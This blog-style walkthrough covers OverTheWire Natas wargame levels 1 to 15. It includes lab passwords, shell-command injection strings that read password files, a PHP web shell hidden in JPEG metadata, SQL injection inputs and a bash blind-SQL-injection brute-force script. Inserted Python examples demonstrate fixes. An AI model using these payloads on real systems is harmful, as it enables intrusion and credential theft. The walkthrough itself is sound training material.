Solutions of NATAS 1-15
Hello folks! In this post I will share with you my solutions for the Natas challenges from one to fifteen. It is strongly recommended not to look at a solution before thinking the level through yourself.

Natas0: The username and password are already provided for Natas0. URL: http://natas0.natas.labs.overthewire.org
Credentials: natas0/natas0
Solution: Log in to the page with the credentials natas0/natas0. In the Chrome browser, right-click and choose “View page source”.
Password for natas1 is: gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1: URL: http://natas1.natas.labs.overthewire.org/
Solution: Log in with the password you got from natas0. In this level right-clicking is disabled, so press the F12 function key to open the Web Developer Tools and select the Elements tab.
Password for natas2 is: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Natas2: URL: http://natas2.natas.labs.overthewire.org
Solution: Log in with the password you got from natas1 and use “View page source” in Chrome. Nothing is obvious at first, but the <img> tag gives us a hint:
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>
Let’s request the directory the image is served from: http://natas2.natas.labs.overthewire.org/files/
Password for natas3 is: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3: URL: http://natas3.natas.labs.overthewire.org
For this challenge we need a basic understanding of robots.txt. It implements the Robots Exclusion Protocol: the file tells user agents (web-crawling software) which parts of a website they may or may not crawl. These crawl instructions are given by “disallowing” or “allowing” certain (or all) user agents.
Solution: Log in with the password you got from natas2 and use “View page source” in Google Chrome.
Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4: URL: http://natas4.natas.labs.overthewire.org To solve this challenge you need a basic understanding of the standard HTTP request headers. The one we need here is the Referer header.
Solution: Referer is an HTTP header field that identifies the address of the web page (i.e. the URI or IRI) that linked to the resource being requested. By checking the referrer, the new web page can see where the request originated. (Wikipedia) We set it to the natas5 URL with curl:
curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/" -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org
Password for natas5 is: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5: URL: http://natas5.natas.labs.overthewire.org When we send a request to the web server with curl, the server answers with a Set-Cookie header. With every following request the user agent sends all previously stored cookies back to the server in the Cookie: header.
curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
* Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
<
Solution: There is no clear answer to this challenge. I just guessed it and modified the cookie by setting Cookie: loggedin=1
curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
* Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
>
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
<
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact
Password for natas6 is: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6: URL: http://natas6.natas.labs.overthewire.org When we check the source code, it compares the value of $secret with the value of the input element. If both values are equal, the password for natas7 is printed.
<?
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
Solution:
The include statement includes and evaluates the specified file (PHP manual). Let’s try to access the includes/secret.inc file directly by requesting the URL http://natas6.natas.labs.overthewire.org/includes/secret.inc
As you can see, the value of the $secret variable is FOEIUWGHFEEUHOFUOIU. Put this value into the input form and submit it.
Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7: URL: http://natas7.natas.labs.overthewire.org
Solution:
Pages are rendered according to the value of $_REQUEST['page']. For example, http://natas7.natas.labs.overthewire.org/index.php?page=about renders the about page. What if we set page to /etc/natas_webpass/natas8? Our URL becomes http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Natas8: URL: http://natas8.natas.labs.overthewire.org
We need a little reverse engineering to solve this challenge. The key thing is the encodeSecret() function: we must find the input for which it yields 3d3d516343746d4d6d6c315669563362, so we undo its steps in reverse order.
Solution: You can use https://repl.it/repls/SoftElegantPublishers as a PHP sandbox.
<?php
echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));
//oubWYf2kBq
?>
Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9: URL: http://natas9.natas.labs.overthewire.org
Solution:
The input is passed to a shell, so we can run a second command by separating it with a semicolon (;):
ls;cat /etc/natas_webpass/natas10
Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10: URL: http://natas10.natas.labs.overthewire.org
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>
Solution: In the snippet above, a few special characters are rejected by the preg_match() PHP function, so we need a needle that gets past this check.
Solution 1: use the needle .* cat /etc/natas_webpass/natas11 so that the password file becomes one of grep’s input files (the shell also expands .* to the dot-files in the web root, which is why .htaccess and .htpasswd appear in the output):
.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
Solution 2: URL-encode a newline (%0A) so that the cat command runs as a separate shell line while the preg_match() check never sees a ; | or &: http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search
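The natas9 and natas10 needles above show why a character blacklist is the wrong fix for command injection. The following is an added Python example (my own code, not from this post or from OverTheWire) that replays the page’s three needles against the page’s `[;|&]` check and against an allowlist, models how /bin/sh would split the string handed to `passthru()`, and shows the hardened pattern: validate against an allowlist and run grep with an argument vector instead of a shell. The allowlist pattern, the `--` end-of-options argument and the temporary dictionary file are my assumptions.

```python
from __future__ import annotations

import re
import shlex
import subprocess
import tempfile
from pathlib import Path

# Inputs taken from the challenge page: natas9 has no filter at all, natas10 only
# rejects ; | & (the %0A of the second natas10 needle is shown here URL-decoded).
NATAS9_PAYLOAD = "ls;cat /etc/natas_webpass/natas10"
NATAS10_GLOB_PAYLOAD = ".* cat /etc/natas_webpass/natas11"
NATAS10_NEWLINE_PAYLOAD = "pass\n cat /etc/natas_webpass/natas11"

BLACKLIST = re.compile(r"[;|&]")              # the page's preg_match('/[;|&]/')
ALLOWLIST = re.compile(r"[A-Za-z0-9]{1,64}")  # assumption: a needle is one plain word


def blacklist_allows(needle: str) -> bool:
    """natas10's check: the input is accepted unless it contains ; | or &."""
    return BLACKLIST.search(needle) is None


def allowlist_allows(needle: str) -> bool:
    """Hardened check: accept only what a dictionary lookup legitimately needs."""
    return ALLOWLIST.fullmatch(needle) is not None


def vulnerable_command(needle: str) -> str:
    """The string natas9/natas10 hand to passthru(): the needle is spliced into a shell line."""
    return f"grep -i {needle} dictionary.txt"


def shell_commands(command: str) -> list[list[str]]:
    """Rough model of how /bin/sh parses that line: newline and ';' end a command,
    whitespace splits arguments (glob expansion of '.*' is not modelled)."""
    return [shlex.split(part) for part in re.split(r"[;\n]", command) if part.strip()]


def safe_argv(needle: str, dictionary: str = "dictionary.txt") -> list[str]:
    """Argument vector for the hardened version: no shell is involved, the needle stays
    a single argument, and '--' stops grep from reading it as an option."""
    return ["grep", "-i", "--", needle, dictionary]


def hardened_search(needle: str, dictionary: str) -> list[str]:
    """Allowlist first, then grep via subprocess with shell=False (the default)."""
    if not allowlist_allows(needle):
        raise ValueError("Input contains an illegal character!")
    result = subprocess.run(safe_argv(needle, dictionary), capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


if __name__ == "__main__":
    for payload in (NATAS9_PAYLOAD, NATAS10_GLOB_PAYLOAD, NATAS10_NEWLINE_PAYLOAD):
        print(f"{payload!r}: blacklist allows={blacklist_allows(payload)} allowlist allows={allowlist_allows(payload)}")
        print("  a shell would run:", shell_commands(vulnerable_command(payload)))
        print("  hardened argv:    ", safe_argv(payload))
    with tempfile.TemporaryDirectory() as tmp:  # constructed dictionary for the demo
        dictionary = Path(tmp, "dictionary.txt")
        dictionary.write_text("password\npassphrase\nsecret\n")
        print("hardened lookup for 'pass':", hardened_search("pass", str(dictionary)))
```

Both natas10 needles pass the blacklist, and the shell model shows why: one turns the password file into an extra grep input, the other ends the grep command and starts a new one. With the argument vector the whole needle is a single grep pattern, so neither trick changes which files are read.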
Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas11: URL: http://natas11.natas.labs.overthewire.org/
<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>
Solution: the logic of XOR encryption. Looking at the source code and the server responses, we know both the cipher text and the plain text, so we can recover the xor_encrypt key for this challenge:
Plain Text XOR Key = Cipher Text
Cipher Text XOR Plain Text = Key
$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
* Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8
The cipher text is the cookie value, base64-encoded (the trailing %3D is a URL-encoded = padding character): ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw
The plain text is what json_encode() produces for the default data:
<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>
Result:
{"showpassword":"no","bgcolor":"#ffffff"}
Let’s use {"showpassword":"no","bgcolor":"#ffffff"} as our known plain text and XOR it with the decoded cipher text.
Key is: qw8J
Encrypted cookie for showing password is: ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org
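To make the key recovery concrete, here is an added Python example (my own code, not part of the original post or of the Natas source) that applies the two equations above to the cookie and plain text shown on this page, reproduces the forged cookie, and then shows the fix that would have closed both this level and natas5: a server-side HMAC over the cookie value, so that a client who knows the encoding still cannot produce a cookie the server accepts. The HMAC secret and the signed-cookie layout are my assumptions.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json

# Values from the challenge page (not constructed): the Set-Cookie issued for the
# default data, URL-decoded, and the default data itself.
SERVER_COOKIE = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def php_json(data: dict) -> bytes:
    """Same bytes as PHP's json_encode(): no whitespace, key order preserved."""
    return json.dumps(data, separators=(",", ":")).encode()


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the page's xor_encrypt()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, plaintext: bytes) -> bytes:
    """Cipher Text XOR Plain Text = key stream; return its shortest repeating unit."""
    stream = xor_encrypt(ciphertext, plaintext)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


def recovered_key() -> bytes:
    """The key behind the page's cookie, derived from the known plain text."""
    return recover_key(base64.b64decode(SERVER_COOKIE), php_json(DEFAULT_DATA))


def make_cookie(data: dict, key: bytes) -> str:
    """saveData(): base64(xor_encrypt(json_encode(data)))."""
    return base64.b64encode(xor_encrypt(php_json(data), key)).decode()


def forged_cookie() -> str:
    """The cookie the page sends to have the password shown."""
    return make_cookie({"showpassword": "yes", "bgcolor": "#ffffff"}, recovered_key())


# --- The fix: authenticate the cookie with a secret only the server holds. ---
# Constructed placeholder; a real deployment loads this from configuration.
HMAC_SECRET = b"constructed-placeholder-secret"


def sign(cookie_value: str) -> str:
    """Append an HMAC-SHA256 tag; the value itself can stay as the page encodes it."""
    tag = hmac.new(HMAC_SECRET, cookie_value.encode(), hashlib.sha256).hexdigest()
    return f"{cookie_value}.{tag}"


def verify(signed_cookie: str) -> str | None:
    """Return the cookie value only if its tag is valid, otherwise None (use defaults)."""
    value, sep, tag = signed_cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(HMAC_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    key = recovered_key()
    print("recovered key:", key.decode())
    print("forged cookie:", forged_cookie())
    signed = sign(SERVER_COOKIE)
    tampered = forged_cookie() + signed[signed.rindex("."):]
    print("server accepts original:", verify(signed) is not None)
    print("server accepts forged:  ", verify(tampered) is not None)
```

Recovering the key needs only one cookie and its known plain text; the period of the XOR stream gives the key length. With the HMAC in place the forged value still decodes correctly, but the server never reaches `json_decode` because the tag check fails first, which is exactly the property natas5’s `loggedin` flag also lacked.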
Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
Natas12: URL: http://natas12.natas.labs.overthewire.org/
1- Install exiftool.
2- Create a very small JPEG image (less than 1 KiB) and name it white.jpg (a small white background is enough).
3- Inject the malicious PHP code into white.jpg’s metadata with exiftool:
exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg
$ exiftool white.jpg
ExifTool Version Number : 10.80
File Name : white.jpg
Directory : .
File Size : 917 bytes
File Modification Date/Time : 2018:11:27 22:11:00+04:00
File Access Date/Time : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time : 2018:11:27 22:11:00+04:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM)
Document Name : <?php system('cat /etc/natas_webpass/natas13'); ?>
X Resolution : 1
Y Resolution : 1
Resolution Unit : None
Y Cb Cr Positioning : Centered
Image Width : 51
Image Height : 51
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 51x51
Megapixels : 0.003
4- Open the browser and request http://natas12.natas.labs.overthewire.org/
5- Open the browser’s Developer Tools and remove the type="hidden" attribute.
6- Modify the suffix from jpg to php.
7- Click the link of the uploaded file; it will be interpreted by PHP.
Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Natas13: URL: http://natas13.natas.labs.overthewire.org You can use the same method as for natas12. The only thing you have to change is the password file the injected command reads:
exiftool -documentname="<?php system('cat /etc/natas_webpass/natas14'); ?>" white.jpg
Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
Natas14: URL: http://natas14.natas.labs.overthewire.org
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
        echo "Successful login! The password for natas15 is <censored><br>";
    } else {
        echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>
Solution: enter " or "1"="1 as the username and " or "1"="1 as the password.
Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas15:
<?
/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>
//omitted...
Solution: My first guess to solve this challenge was the into outfile statement. Unluckily, I do not have permission to create a file. For more information, check the secure_file_priv option of the MySQL server.
Example: select * from users where username="natas16" into outfile "/var/www/html"
After three days of trying other methods I was stuck on this challenge, so I had to get a hint. The hint was “Blind SQL Injection”. After reading some blog posts, I understood the logic and created my own solution to find the password. Basically the script brute-forces the password by trying all the letters (uppercase and lowercase) and digits.
#!/bin/bash
# Candidate characters: a-z, A-Z, 0-9
letters=""
for i in {a..z}
do
  letters+=$i
done
for i in {A..Z}
do
  letters+=$i
done
for i in {0..9}
do
  letters+=$i
done
#################################################################
echo $letters
echo ""
echo ""
key=""
# Each outer pass extends the known prefix by one character: the page answers
# "This user exists." only when password LIKE BINARY "<key><letter>%" holds for natas16.
for count in {1..40}
do
  for (( i=0; i<${#letters}; i++ )); do
    letter="${letters:$i:1}"
    if curl -s -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" | grep -q "This user exists."; then
      key+=$letter
    fi
  done
done
echo "key is: $key"
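For natas14 and natas15 together, here is an added Python example (my own code, not from this post or from the Natas source) that rebuilds both queries on an in-memory SQLite table with the page’s `users` layout and a constructed password. SQLite quotes strings with ', so the page’s payloads are written with ' instead of "; `PRAGMA case_sensitive_like` stands in for MySQL’s LIKE BINARY. Each vulnerable query sits beside its parameterised version: the natas14 login accepts `' or '1'='1` only when the query is built by string concatenation, and the natas15 character-by-character oracle used by the script above recovers the password only from the concatenated query and returns nothing against the parameterised one.

```python
import sqlite3
import string

# The script's alphabet: a-z, A-Z, 0-9.
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits

# Constructed sample row; the real natas16 password is not on this page.
SAMPLE_PASSWORD = "Xy7kL"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA case_sensitive_like = ON")  # stands in for LIKE BINARY
    conn.execute("CREATE TABLE users (username varchar(64) DEFAULT NULL, password varchar(64) DEFAULT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("natas16", SAMPLE_PASSWORD))
    return conn


# --- natas14: login check ---------------------------------------------------
def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation, as in the page's PHP; user input becomes SQL syntax."""
    query = f"SELECT * from users where username='{username}' and password='{password}'"
    return len(conn.execute(query).fetchall()) > 0


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised: the driver sends the values separately, never as SQL."""
    rows = conn.execute("SELECT * from users where username=? and password=?", (username, password)).fetchall()
    return len(rows) > 0


# --- natas15: "does this user exist" oracle --------------------------------
def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    query = f"SELECT * from users where username='{username}'"
    try:
        return len(conn.execute(query).fetchall()) > 0
    except sqlite3.Error:
        return False  # the page's "Error in query." branch


def user_exists_hardened(conn: sqlite3.Connection, username: str) -> bool:
    return len(conn.execute("SELECT * from users where username=?", (username,)).fetchall()) > 0


def recover_by_oracle(oracle, max_len: int = 40) -> str:
    """The bash script's loop: extend the prefix while the oracle keeps saying 'exists'."""
    key = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            probe = f"natas16' and password like '{key}{ch}%"
            if oracle(probe):
                key += ch
                break
        else:
            return key  # no character extends the prefix: done
    return key


if __name__ == "__main__":
    conn = make_db()
    injection = "' or '1'='1"
    print("natas14 vulnerable login with injection:", login_vulnerable(conn, injection, injection))
    print("natas14 hardened login with injection:  ", login_hardened(conn, injection, injection))
    print("natas15 oracle, vulnerable query:", repr(recover_by_oracle(lambda u: user_exists_vulnerable(conn, u))))
    print("natas15 oracle, hardened query:  ", repr(recover_by_oracle(lambda u: user_exists_hardened(conn, u))))
```

The parameterised queries still do exactly what the application needs (a real username and password log in, a real username “exists”), which is the usual argument for fixing injection at the query layer rather than by filtering input: the concatenated and parameterised versions differ only for inputs that were never valid usernames.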
Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh